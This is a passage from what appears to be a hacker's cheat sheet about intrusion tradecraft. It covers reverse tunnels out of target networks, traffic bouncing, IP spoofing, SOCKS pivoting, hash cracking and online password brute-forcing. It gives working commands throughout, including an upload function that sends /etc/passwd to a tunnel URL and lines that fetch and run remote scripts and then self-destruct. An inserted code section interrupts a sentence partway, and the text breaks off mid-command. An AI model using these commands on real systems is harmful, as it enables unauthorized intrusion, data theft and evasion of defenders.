[bore.pub](https://github.com/ekzhang/bore) (free):\n```sh\n# Forward a random public TCP port to localhost:31337\nbore local 31337 --to bore.pub\n```\n\nusing [serveo.net](https://serveo.net) (free):\n```sh\n# Forward a random public TCP port to 
localhost:31337\nssh -R 0:localhost:31337 serveo.net\n```\n\nSee also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [playit](https://playit.gg/) (free) or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port.\n\nOther free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets).\n\n---\n\u003ca id=\"https\"\u003e\u003c/a\u003e\n**3.iii.b HTTPS reverse tunnels**\n\nOn the server, use any one of these three HTTPS tunneling services:  \n```sh\n### Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080:\nssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run\n### Or using remote.moe\nssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@remote.moe\n### Or using cloudflared\ncurl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64\nchmod 755 cloudflared\ncloudflared tunnel --url http://localhost:8080 --no-autoupdate\n```\nEither service will generate a new temporary HTTPS-URL for you to use.  \n\nThen, use [websocat](https://github.com/vi/websocat) or [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL:\n\nA. A simple STDIN/STDOUT pipe via HTTPS:\n```sh\n### On the server convert WebSocket to raw TCP:\nwebsocat -s 8080\n```\n```sh\n### On the remote target forward stdin/stdout to WebSocket:\nwebsocat wss://\u003cHTTPS-URL\u003e\n```\n\nB. 
Forward raw TCP via HTTPS:\n```sh\n### On the server: Gost will translate any HTTP-websocket request to a TCP socks5 request:\ngost -L mws://:8080\n```\n\nForward port 2222 to the server's port 22.\n```sh\n### On the workstation:\ngost -L tcp://:2222/127.0.0.1:22 -F 'mwss://\u003cHTTPS-URL\u003e:443'\n### Test the connection (will connect to localhost:22 on the server)\nnc -vn 127.0.0.1 2222\n```\nor use the server as a Socks-Proxy EXIT node (e.g. access any host inside the server's network or even the Internet via the server (using the HTTPS reverse tunnel from above):\n```sh\n### On the workstation:\ngost -L :1080 -F 'mwss://\u003cHTTPS-URL\u003e:443'\n### Test the Socks-proxy:\ncurl -x socks5h://0 ipinfo.io\n```\n\nMore: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvesec/port-forwarding) and [Tunnel via Cloudflare to any TCP Service](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) and [Awesome Tunneling](https://github.com/anderspitman/awesome-tunneling).\n\n---\n\u003ca id=\"iptables\"\u003e\u003c/a\u003e\n**3.iii.c Bouncing traffic with iptables**\n\nBounce through a host/router without needing to run a userland proxy or forwarder:\n```sh\nipfwinit() {\n    echo 1 \u003e/proc/sys/net/ipv4/ip_forward\n    echo 1 \u003e/proc/sys/net/ipv4/conf/all/route_localnet\n    [ $# -le 0 ] \u0026\u0026 set -- \"0.0.0.0/0\"\n    while [ $# -gt 0 ]; do\n        iptables -t mangle -I PREROUTING -s \"${1}\" -p tcp -m addrtype --dst-type LOCAL -m conntrack ! 
--ctstate ESTABLISHED -j MARK --set-mark 1188 \n        shift 1\n    done\n    iptables -t mangle -D PREROUTING -j CONNMARK --restore-mark \u003e/dev/null 2\u003e/dev/null\n    iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark\n    iptables -I FORWARD -m mark --mark 1188 -j ACCEPT\n    iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE\n    iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark\n}\nipfw() {\n    iptables -t nat -A PREROUTING -p tcp --dport \"${1:?}\" -m mark --mark 1188 -j DNAT --to \"${2:?}:${3:?}\"\n}\nipfwinit                             # Allow EVERY IP to bounce\n# ipfwinit \"1.2.3.4/16\" \"6.6.0.0/16\" # Only allow these SOURCE IPs to bounce\n```\n\nThen set forwards like so:\n```sh\nipfw 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port.\nipfw 31338 127.0.0.1 8080   # Bounce 31338 to the server's 8080 (localhost)\nipfw 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443\n```\n\nWe use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks.\n```sh\n# Deploy on a target that can only reach 192.168.0.100  \nGS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh  \n```\n```sh\n# Access the target  \nGS_HOST=213.171.212.212 gs-netcat -i -s ...\n```\n\n---\n\u003ca id=\"ghost\"\u003e\u003c/a\u003e\n**3.vi.c Ghost IP / IP Spoofing**\n\nUseful on a host inside the target network. This tool re-configures the SHELL (without leaving a trace): any program (nmap, cme, ...) started from this SHELL will use a fake IP. 
All your attacks will originate from a host that does not exist.\n\n```sh\nsource \u003c(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh)\n```\n\nThis also works in combination with:\n * [Segfault's ROOT Servers](https://thc.org/segfault/wireguard): Will connect your ROOT Server to the TARGET NETWORK and using a Ghost IP inside the target network.\n * [QEMU Tunnels](https://securelist.com/network-tunneling-with-qemu/111803/): As above, but less secure.\n\n---\n\u003ca id=\"tunnel-more\"\u003e\u003c/a\u003e\n**3.vi.d Various Tunnel Tricks**\n\n### Tunnel via CDN\n * Read [How to tunnel any TCP service via CloudFlare](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) or use [DarkFlare](https://github.com/doxx/darkflare).\n\n### Connect your host directly to the remote network\n * [WireTap](https://github.com/sandialabs/wiretap) - Works as user or root. Uses UDP as transport. ([Try it](https://thc.org/segfault/wireguard) on segfault.)\n * [ligolo-ng](https://github.com/nicocha30/ligolo-ng) - Uses TCP as transport. Works well via [cloudflare CDN](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) or gs-netcat.\n\n### Use SSH as a cheap reverse proxy via Cloudflare\n\nThis method is similar to [HTTPS reverse tunnels](#https) but uses SSH instead of Gost or websocat.\n- Advantage: Only uses *cloudflared* and *SSH* on the target.\n- Disadvantage: Needs a CF subscription.\n\n 1. Go to your CF Dashboard -\u003e Zero Trust -\u003e Networks -\u003e Tunnels\n 2. Create a new 'Cloudflared' tunnel of any name.\n 3. Select Debian \u0026 64-bit. The Token is not fully shown. Extract the \"Token\" by copying the grayed out area into a separate document to reveal the entire Token (the long hex-strings after `sudo cloudflared service install \u003cTunnelTokenHere\u003e`).\n 4. Add a subdomain (example uses `ssh.team-teso.net`).\n 5. 
Set Type=TCP URL=localhost:22\n\n```shell\n### On YOUR workstation:\ncloudflared tunnel run --token TunnelTokenHere\n```\n\n```shell\n### On the TARGET, create a reverse-SOCKS connection with SSH over Cloudflare\n### (reverse dynamic forwarding, -R with a single port, needs OpenSSH 7.6 or newer on the target):\nssh -o ProxyCommand=\"cloudflared access tcp --hostname ssh.team-teso.net\" root@0 -R 1080\n```\n\n```shell\n### On your workstation, connect to _any_ host within the target network (example: ipinfo.io)\ncurl -x socks5h://0 https://ipinfo.io\n```\nUse [ProxyChains or GrafTCP to tunnel](#scan-proxy) other protocols via the reverse proxy.\n\n\n---\n\u003ca id=\"scan-proxy\"\u003e\u003c/a\u003e\n**3.iv. Use any tool via Socks Proxy**\n\n### Create a tunnel from the target to your workstation using gsocket:\nOn the target's network:\n```sh\n## Create a SOCKS proxy into the target's network.\n## Use gs-netcat but ssh -D would work as well.\ngs-netcat -l -S\n```\n\nOn your workstation:\n```sh\n## Create a gsocket tunnel into the target's network:\ngs-netcat -p 1080\n```\n\n### Using ProxyChains:\n```sh\n## Use ProxyChains to access any host on the target's network:\necho -e \"[ProxyList]\\nsocks5 127.0.0.1 1080\" \u003epc.conf\nproxychains -f pc.conf -q curl ipinfo.io\n## Scan the router at 192.168.1.1. ProxyChains only hooks connect(), so force a TCP connect scan (-sT);\n## a raw SYN scan (nmap's default when run as root) would bypass the proxy.\nproxychains -f pc.conf -q nmap -n -Pn -sT -sV -F --open 192.168.1.1\n## Start 10 nmaps in parallel:\nseq 1 254 | xargs -P10 -I{} proxychains -f pc.conf -q nmap -n -Pn -sT -sV -F --open 192.168.1.{}\n```\n\n### Using GrafTCP:\n```sh\n## Use graftcp to access any host on the target's network:\n(graftcp-local -select_proxy_mode only_socks5 \u0026)\ngraftcp curl ipinfo.io\ngraftcp ssh root@192.168.1.1\ngraftcp nmap -n -Pn -sT -sV -F --open 192.168.1.1\n```\n\n---\n\u003ca id=\"your-ip\"\u003e\u003c/a\u003e\n**3.v. 
Find your public IP address**\n\n```sh\ncurl -s wtfismyip.com/json | jq\ncurl ifconfig.me\n# via DNS (works when HTTP egress is filtered):\ndig +short myip.opendns.com @resolver1.opendns.com\nhost myip.opendns.com resolver1.opendns.com\n```\n\nGet geolocation information about any IP address:\n\n```sh\ncurl https://ipinfo.io/8.8.8.8 | jq\ncurl http://ip-api.com/8.8.8.8\ncurl https://cli.fyi/8.8.8.8\n```\n\nGet ASN information by IP address:\n\n```sh\nasn() {\n  [[ -n $1 ]] \u0026\u0026 { echo -e \"begin\\nverbose\\n${1}\\nend\"|netcat whois.cymru.com 43| tail -n +2; return; }\n  (echo -e 'begin\\nverbose';cat -;echo end)|netcat whois.cymru.com 43|tail -n +2\n}\nasn 1.1.1.1           # Single IP Lookup\ncat IPS.txt | asn     # Bulk Lookup\n```\n\nCheck if TOR is working:\n\n```sh\ncurl -x socks5h://localhost:9050 -s https://check.torproject.org/api/ip\n### Result should be {\"IsTor\":true...\n```\n\n---\n\u003ca id=\"check-reachable\"\u003e\u003c/a\u003e\n**3.vi. Check reachability from around the world**\n\nThe fine people at [https://ping.pe/](https://ping.pe/) let you ping/traceroute/mtr/dig a host from around the world, check TCP ports, resolve domain names, and much more.\n\nTo check how well your (current) host can reach the Internet use [OONI Probe](https://ooni.org/support/ooni-probe-cli):\n```sh\nooniprobe run im\nooniprobe run websites\nooniprobe list\nooniprobe list 1\n```\n\n---\n\u003ca id=\"check-open-ports\"\u003e\u003c/a\u003e\n**3.vii. 
Check/Scan Open Ports on an IP**\n\n[Censys](https://search.censys.io/) or [Shodan](https://internetdb.shodan.io) Port lookup service:\n```shell\ncurl https://internetdb.shodan.io/1.1.1.1\n```\n\nFast (-F) vulnerability scan:\n```shell\n# Version gathering\nnmap -n -Pn -sCV -F --open --min-rate 10000 scanme.nmap.org\n# Vulns\nnmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org\n```\n\nUsing bash only (the `/dev/tcp` redirect opens a TCP connection; no other tool needed):\n```shell\ntimeout 5 bash -c \"\u003c/dev/tcp/1.2.3.4/31337\" \u0026\u0026 echo OPEN || echo CLOSED\n```\n\n---\n\u003ca id=\"bruteforce\"\u003e\u003c/a\u003e\n**3.viii. Crack Password hashes**\n\n 1. [NTLM2password](https://ntlm.pw/) to crack (lookup) NTLM passwords\n 2. [wpa-sec](https://wpa-sec.stanev.org) to crack (lookup) WPA PSK passwords\n\nHashCat is our go-to tool for everything else:\n```shell\nhashcat my-hash /usr/share/wordlists/rockyou.txt\n```\n\nUsing a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/) on GPU:\n```sh\ncurl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask -o 10-days_7-16.hcmask\n# -d2 == Use GPU #2 only (device #2)\n# -O  == Up to 50% faster but limits password length to \u003c= 15\n# -w1 == workload low (-w3 == high)\nnice -n 19 hashcat -o cracked.txt my-hash.txt -w1 -a3 10-days_7-16.hcmask -O -d2\n```\n\nCrack OpenSSH's `known_hosts` hashes to reveal the IP address:\n```shell\ncurl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/ipv4_hcmask.txt -o ipv4_hcmask.txt\ncurl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/kh-converter.py -o kh-converter.py\npython kh-converter.py ~/.ssh/known_hosts \u003e~/.ssh/known_hosts_hashes\n# -m 160 == HMAC-SHA1 (key = $salt): the entry's salt keys the HMAC over the hostname/IP string\nhashcat -m 160 --quiet --hex-salt ~/.ssh/known_hosts_hashes -a 3 ipv4_hcmask.txt\n```\n\n👉 Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions).\n\nBe aware that `$6$` hashes are SLOW. 
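Back to the `known_hosts` hashes: what `-m 160 --hex-salt` attacks is `|1|base64(salt)|base64(HMAC-SHA1(key=salt, msg=host))`. The functions below are an added example, not part of the original cheat sheet or of kh-converter.py: they recompute that HMAC with the openssl CLI so you can check a cracked (or guessed) host against an entry without hashcat, and emit the `hexhash:hexsalt` lines that mode 160 with `--hex-salt` consumes. They assume GNU coreutils (`base64`, `od`, `tr`) and the `openssl` binary; the salt in the usage comment is a constructed 20-byte value, not one from a real file.

```bash
#!/bin/bash
# A hashed known_hosts entry has the form
#   |1|<base64 salt>|<base64 HMAC-SHA1(key=salt, msg=host)> <keytype> <key>
# where salt is 20 random bytes and "host" is the string ssh saw, so
# "192.168.1.1" and "[192.168.1.1]:2222" hash differently.
# Requires: GNU coreutils (base64, od, tr) and the openssl CLI.

# Base64 salt -> hex, the form hashcat expects with --hex-salt.
kh_salt_hex() {
    printf '%s' "${1:?base64 salt}" | base64 -d | od -An -tx1 | tr -d ' \n'
}

# base64(HMAC-SHA1(salt, host)) for one candidate host.
kh_hash() {
    printf '%s' "${2:?host}" \
        | openssl dgst -sha1 -mac HMAC -macopt "hexkey:$(kh_salt_hex "${1:?base64 salt}")" -binary \
        | base64
}

# Hashed part of an entry, as ssh-keygen -H would write it (key material omitted).
kh_entry() {
    printf '|1|%s|%s\n' "${1:?base64 salt}" "$(kh_hash "$1" "${2:?host}")"
}

# Return 0 if HOST is the host behind hashed ENTRY, 1 otherwise.
kh_match() {
    local rest salt_b64 hash_b64
    rest=${1#"|1|"}; rest=${rest%% *}        # strip the |1| marker and any key material
    salt_b64=${rest%%|*}
    hash_b64=${rest#*|}
    [ "$(kh_hash "$salt_b64" "${2:?host}")" = "$hash_b64" ]
}

# known_hosts on stdin -> "hexhash:hexsalt" lines for: hashcat -m 160 --hex-salt
kh_to_hashcat() {
    local line rest salt_b64 hash_b64
    while IFS= read -r line; do
        case $line in '|1|'*) ;; *) continue ;; esac   # skip unhashed and comment lines
        rest=${line#"|1|"}; rest=${rest%% *}
        salt_b64=${rest%%|*}
        hash_b64=${rest#*|}
        printf '%s:%s\n' \
            "$(printf '%s' "$hash_b64" | base64 -d | od -An -tx1 | tr -d ' \n')" \
            "$(kh_salt_hex "$salt_b64")"
    done
}

# Usage (constructed salt, not a real entry):
#   e=$(kh_entry AAECAwQFBgcICQoLDA0ODxAREhM= 192.168.1.1)
#   kh_match "$e" 192.168.1.1 && echo "192.168.1.1 is the hashed host"
#   kh_to_hashcat <~/.ssh/known_hosts >known_hosts_hashes
```

`kh_match` is handy for confirming a hashcat result, or for trying a handful of likely hosts without a GPU. Note that it fails for `[192.168.1.1]:2222` even when `192.168.1.1` matches: ssh hashes the bracketed host:port form for non-default ports, which is why an IPv4-only mask misses those entries.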
For `$6$` hashes, even the [1-minute 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/01%20instant_1-minute/1-minute_7-16.hcmask) would take many days on an 8xRTX4090 cluster to complete.\n\nRent an RTX-4090 GPU cluster at [vast.ai](https://www.vast.ai) for $0.40/h and use [dizcza/docker-hashcat:cuda](https://hub.docker.com/r/dizcza/docker-hashcat) ([read more](https://adamsvoboda.net/password-cracking-in-the-cloud-with-hashcat-vastai/)).\n\nOtherwise, use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/) instances.\n\n**3.ix. Brute Force Passwords / Keys**\n\nThe following is for brute forcing (guessing) passwords of ONLINE SERVICES.\n\n\u003ca id=\"gmail\"\u003e\u003c/a\u003e\n\u003cdetails\u003e\n  \u003csummary\u003eGMail Imbeciles - CLICK HERE\u003c/summary\u003e\n\n\u003e You cannot brute force GMAIL accounts.  \n\u003e SMTP AUTH/LOGIN IS DISABLED ON GMAIL.  
\n\u003e All GMail Brute Force and Password Cracking tools are FAKE.\n\u003c/details\u003e\n\nAll tools are pre-installed on segfault:\n```shell\nssh root@segfault.net # password is 'segfault'\n```\n(You may want to use your [own EXIT node](https://www.thc.org/segfault/wireguard))\n\nTools:\n* [Ncrack](https://nmap.org/ncrack/man.html)\n* [Nmap BRUTE](https://nmap.org/nsedoc/categories/brute.html)\n* [THC Hydra](https://sectools.org/tool/hydra/)\n* [Medusa](https://www.geeksforgeeks.org/password-cracking-with-medusa-in-linux/) / [docs](http://foofus.net/goons/jmk/medusa/medusa.html)\n* [Metasploit](https://docs.rapid7.com/metasploit/bruteforce-attacks/)\n* [Crowbar](https://github.com/galkan/crowbar) - great for trying all ssh keys on a target IP range.\n\nUsername \u0026 Password lists:\n* `/usr/share/nmap/nselib/data`  \n* `/usr/share/wordlists/seclists/Passwords`\n* https://github.com/berzerk0/Probable-Wordlists - \u003eTHC's FAVORITE\u003c\n* https://github.com/danielmiessler/SecLists  \n* https://wordlists.assetnote.io  \n* https://weakpass.com  \n* https://crackstation.net/  \n\n\nSet **U**sername/**P**assword list and **T**arget host.\n```shell\nULIST=\"/usr/share/wordlists/brutespray/mysql/user\"\nPLIST=\"/usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt\"\nT=\"192.168.0.1\"\n```\n\nUseful **Nmap** parameters:\n```shell\n--script-args userdb=\"${ULIST}\",passdb=\"${PLIST}\",brute.firstOnly\n```\n\nUseful **Ncrack** parameters:\n```shell\n-U \"${ULIST}\"\n-P \"${PLIST}\"\n```\n\nUseful **Hydra** parameters:\n```shell\n-t4      # Limit to 4 tasks\n-l root  # Set username\n-V       # Show each login/password attempt\n-s 31337 # Set port\n-S       # Use SSL\n-f       # Exit after first valid login\n```\n\n\u003c!--\n```shell\n## HTTP Login (path, form field names and the failure string must match the target's login form)\nhydra -l admin -P \"${PLIST}\" \"$T\" http-post-form \"/admin.php:u=^USER^\u0026p=^PASS^\u0026f=login:Enter\" -v\n```\n--\u003e\n```shell\n## SSH\nnmap -p 22 --script ssh-brute --script-args ssh-brute.timeout=4s 
\"$T\"\nncrack -P \"${PLIST}\" --user root \"ssh://${T}\"\nhydra -P \"${PLIST}\" -l root \"ssh://$T\"\n```\n\n```shell\n## Remote Desktop Protocol / RDP\nncrack -P \"${PLIST}\" --user root -p3389 \"${T}\"\nhydra -P \"${PLIST}\" -l root \"rdp://$T\"\n```\n\n```shell\n## FTP\nhydra -P \"${PLIST}\" -l user \"ftp://$T\"\n```\n\n```shell\n## IMAP (email)\nnmap -p 143,993 --script imap-brute \"$T\"\n```\n\n```shell\n## POP3 (email)\nnmap -p110,995 --script pop3-brute \"$T\"\n```\n\n```shell\n## MySQL\nnmap -p3306 --script mysql-brute \"$T\"\n```\n\n```shell\n## PostgreSQL\nnmap -p5432 --script pgsql-brute \"$T\"\n```\n\n```shell\n## SMB (windows)\nnmap --script smb-brute \"$T\"\n```\n\n```shell\n## Telnet\nnmap -p23 --script telnet-brute --script-args telnet-brute.timeout=8s \"$T\"\n```\n\n```shell\n## VNC\nnmap -p5900 --script vnc-brute \"$T\"\nncrack -P \"${PLIST}\" --user root \"vnc://$T\"\nhydra -P \"${PLIST}\" \"vnc://$T\"\nmedusa -P \"${PLIST}\" –u root –M vnc -h \"$T\"\n```\n\n```shell\n## VNC (with metasploit)\nmsfconsole\nuse auxiliary/scanner/vnc/vnc_login\nset rhosts 192.168.0.1\nset pass_file /usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt\nrun\n```\n\n```shell\n## HTML basic auth\necho admin \u003euser.txt                     # Try only 1 username\necho -e \"blah\\naaddd\\nfoobar\" \u003epass.txt  # Add some passwords to try. 'aaddd' is the valid one.\nnmap -p80 --script http-brute --script-args \\\n   http-brute.hostname=pentesteracademylab.appspot.com,http-brute.path=/lab/webapp/basicauth,userdb=user.txt,passdb=pass.txt,http-brute.method=POST,brute.firstOnly \\\n   pentesteracademylab.appspot.com\n```\n\n---\n\u003ca id=\"exfil\"\u003e\u003c/a\u003e\n## 4. Data Upload/Download/Exfil\n\u003ca id=\"file-encoding\"\u003e\u003c/a\u003e\n\n### 4.i File Encoding\n\nTrick to transfer a file to the target when the target does not have access to the Internet: Convert the binary file into ASCII-text (base64) and then use cut \u0026 paste. 
(Alternatively use gs-netcat's elite console with `Ctrl-e c` to transfer file over the same TCP connection.)\n\nUse `xclip` (on your workstation) to pipe the encoded data straight into your clipboard:\n```shell\nbase64 -w0 \u003c/etc/issue.net | xclip\n```\n\n\n\n#### \u003e\u003e\u003e UU encode/decode\n\n```sh\n## uuencode \nuuencode /etc/issue.net issue.net-COPY\n```\n\u003cdetails\u003e\n  \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e begin 644 issue.net-COPY  \n\u003e 72V%L:2!'3E4O3\u0026EN=7@@4F]L;\u0026EN9PH\\`  \n\u003e `  \n\u003e end\n\u003c/details\u003e\n\n```sh\n## uudecode (cut \u0026 paste the 3 lines from above):\nuudecode\n```\n#### \u003e\u003e\u003e base64 encode/decode\n\n```sh\nbase64 -w0 \u003c/etc/issue.net \n```\n\u003cdetails\u003e\n  \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e VWJ1bnR1IDE4LjA0LjIgTFRTCg==\n\u003c/details\u003e\n\n```sh\nbase64 -d \u003eissue.net-COPY\n```\n\n#### \u003e\u003e\u003e Openssl encode/decode\n\n```sh\nopenssl base64 \u003c/etc/issue.net \n```\n\u003cdetails\u003e\n  \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e VWJ1bnR1IDE4LjA0LjIgTFRTCg==\n\u003c/details\u003e\n\n```sh\nopenssl base64 -d \u003eissue.net-COPY\n```\n\n#### \u003e\u003e\u003e xxd encode/decode\n\n```sh\nxxd -p \u003c/etc/issue.net\n```\n\u003cdetails\u003e\n  \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e 4b616c6920474e552f4c696e757820526f6c6c696e670a\n\u003c/details\u003e\n\n```sh\nxxd -p -r \u003eissue.net-COPY\n```\n\n---\n\u003ca id=\"cut-paste\"\u003e\u003c/a\u003e\n### 4.ii. File transfer - using cut \u0026 paste\n\nPaste into a file on the remote machine (note the `\u003c\u003c-'__EOF__'` to not mess with tabs or $-variables).\n```sh\ncat \u003eoutput.txt \u003c\u003c-'__EOF__'\n[...]\n__EOF__  ### Finish your cut \u0026 paste by typing __EOF__\n```\n\n---\n\u003ca id=\"xfer-tmux\"\u003e\u003c/a\u003e\n### 4.iii. 
File transfer - using *tmux*\n\nStart `tmux` on your workstation. Connect to your target by any means you like (ssh, gs-netcat, ...).\n\n#### From REMOTE to LOCAL (download)\n\nUse [Tmux-Logging](#tmux) to download large files from the target via the terminal to your workstation.\n\n#### From LOCAL to REMOTE (upload)\n\nStart your favorite decoding tool (base64) on the REMOTE:\n```shell\n# Use 'Ctrl-b $' to rename this tmux session to 'foo'\nbase64 -d \u003escreen-xfer.txt\n```\n\nOn your workstation, and from a different terminal, send base64-encoded data. It will arrive on your REMOTE in `screen-xfer.txt`.\n```shell\ntmux send-keys -t foo \"$(base64 -w64 \u003c/etc/issue.net)\"$'\\n'\n# Press 'Ctrl-d' in the receiving terminal.\n# Optional: Use -t foo:1.2 to send to window #1 and pane #2 instead.\n# Optional: Use 'Ctrl-b ,' to rename the window\n```\n\n---\n\u003ca id=\"file-transfer-screen\"\u003e\u003c/a\u003e\n### 4.iv. File transfer - using *screen*\n\n#### From REMOTE to LOCAL (download)\n\nHave a *screen* running on your local computer and log into the remote system from within your shell. Instruct your local screen to log all output to screen-xfer.txt:\n\n\u003e CTRL-a : logfile screen-xfer.txt\n\n\u003e CTRL-a H\n\nWe use *openssl* to encode our data but any of the above encoding methods works. 
This command will display the base64 encoded data in the terminal and *screen* will write this data to *screen-xfer.txt*:\n\n```sh\n## On the remote system encode issue.net\nopenssl base64 \u003c/etc/issue.net\n```\n\nStop your local screen from logging any further data:\n\n\u003e CTRL-a H \n\nOn your local computer decode the file:\n```sh\nopenssl base64 -d \u003cscreen-xfer.txt\nrm -rf screen-xfer.txt\n```\n\n#### From LOCAL to REMOTE (upload)\n\nOn your local system encode the data:\n```sh\nopenssl base64 \u003c/etc/issue.net \u003escreen-xfer.txt\n```\n\nOn the remote system (and from within the current *screen*):\n```sh\nopenssl base64 -d\n```\n\nGet *screen* to slurp the base64 encoded data into screen's clipboard and paste the data from the clipboard to the remote system:\n\n\u003e CTRL-a : readbuf screen-xfer.txt\n\n\u003e CTRL-a : paste .\n\n\u003e CTRL-d\n\n\u003e CTRL-d\n\nNote: Two CTRL-d are required due to a [bug in openssl](https://github.com/openssl/openssl/issues/9355).\n\n---\n\u003ca id=\"file-transfer-gs-netcat\"\u003e\u003c/a\u003e\n### 4.v. File transfer - using gs-netcat and sftp\n\nUse [gs-netcat](https://github.com/hackerschoice/gsocket) and encapsulate the sftp protocol within. Allows access to hosts behind NAT/Firewall.\n\n```sh\ngs-netcat -s MySecret -l -e /usr/lib/sftp-server         # Host behind NAT/Firewall\n```\n\nFrom your workstation execute this command to connect to the SFTP server:\n```sh\nexport GSOCKET_ARGS=\"-s MySecret\"                        # Workstation\nsftp -D gs-netcat                                        # Workstation\n```\n\nOr to DUMP a single file:\n```sh\n# On the sender\ngs-netcat -l \u003c\"FILENAME\" # Will output a SECRET used by the receiver\n\n# On the receiver\ngs-netcat \u003e\"FILENAME\"  # When prompted, enter the SECRET from the sender\n```\n\n---\n\u003ca id=\"http\"\u003e\u003c/a\u003e\n### 4.vi. 
File transfer - using HTTPS\n\n#### Download from Server to Receiver:\n\nOn the Sender/Server:\n```sh\n## Spawn a temporary HTTP server and share the current working directory.\npython -m http.server 8080 --bind 127.0.0.1 \u0026\n# alternative: php -S 127.0.0.1:8080\ncloudflared tunnel -url localhost:8080\n```\nReceiver: Access the URL from any browser to browse and download the shared directory (the quick tunnel is public: anyone who learns the URL can read it).\n\n#### 1 - Upload using PHP:\n\nOn the Receiver:\n```posh\ncurl -fsSL -o upload_server.php https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/upload_server.php\nmkdir upload\n(cd upload; php -S 127.0.0.1:8080 ../upload_server.php \u0026\u003e/dev/null \u0026)\ncloudflared tunnel --url localhost:8080 --no-autoupdate\n```\n\nOn the Sender:\n```posh\n# Set a function:\nup() { curl -fsSL -F \"file=@${1:?}\" https://ABOVE-URL-HERE.trycloudflare.com; }\n# upload files like so:\nup warez.tar.gz\nup /etc/passwd\n```\n\n#### 2 - Upload using PYTHON:\n\nOn the Receiver:\n```posh\npip install uploadserver\npython -m uploadserver \u0026\ncloudflared tunnel -url localhost:8000\n```\n\nOn the Sender:\n```posh\ncurl -X POST  https://CF-URL-CHANGE-ME.trycloudflare.com/upload -F 'files=@myfile.txt'\n```\n\n---\n\u003ca id=\"download\"\u003e\u003c/a\u003e\n### 4.vii. File download without curl\n\nUsing Python, download only:\n```sh\n# Declare a curl-alternative (note: TLS certificate verification is disabled via CERT_NONE)\npurl() {\n    local url=\"${1:?}\"\n    { [[ \"${url:0:8}\" == \"https://\" ]] || [[ \"${url:0:7}\" == \"http://\" ]]; } || url=\"https://${url}\"\n    \"$(which python3 || which python || which python2 || which false)\" -c \"\\\nimport urllib.request\nimport sys\nimport ssl\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\nsys.stdout.buffer.write(urllib.request.urlopen(\\\"$url\\\", timeout=10, context=ctx).read())\"\n}\n# purl ipinfo.io\n```\n\nExample: Installing gsocket with purl:\n```sh\n# cut \u0026 paste the above purl() function into your bash. 
Then cut \u0026 paste the following:\nsource \u003c(purl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh) \\\n\u0026\u0026 bin curl \\\n\u0026\u0026 bash -c \"$(curl -fsSL https://gsocket.io/y)\" \\\n\u0026\u0026 xdestruct\n```\n\nUsing OpenSSL, download only:\n```sh\n# No certificate verification either: s_client continues even when the chain does not validate.\nsurl() {\n    local r=\"${1#*://}\"\n    local opts=(\"-quiet\" \"-ign_eof\")\n    IFS=/ read -r host query \u003c\u003c\u003c\"${r}\"\n    openssl s_client --help 2\u003e\u00261| grep -qFm1 -- -ignore_unexpected_eof \u0026\u0026 opts+=(\"-ignore_unexpected_eof\")\n    openssl s_client --help 2\u003e\u00261| grep -qFm1 -- -verify_quiet \u0026\u0026 opts+=(\"-verify_quiet\")\n    echo -en \"GET /${query} HTTP/1.0\\r\\nHost: ${host%%:*}\\r\\n\\r\\n\" \\\n\t| openssl s_client \"${opts[@]}\" -connect \"${host%%:*}:443\" \\\n\t| sed '1,/^\\r\\{0,1\\}$/d'\n}\n# surl ipinfo.io\n```\n\nUsing Perl, download only:\n```sh\nlurl() {\n    local url=\"${1:?}\"\n    { [[ \"${url:0:8}\" == \"https://\" ]] || [[ \"${url:0:7}\" == \"http://\" ]]; } || url=\"https://${url}\"\n    perl -e 'use LWP::Simple qw(get);\nmy $url = '\"'${url}'\"';\nprint(get $url);'\n}\n# lurl ipinfo.io\n```\n\nUsing bash, download only (plain HTTP, no TLS):\n```sh\nburl() {\n    IFS=/ read -r proto x host query \u003c\u003c\u003c\"$1\"\n    exec 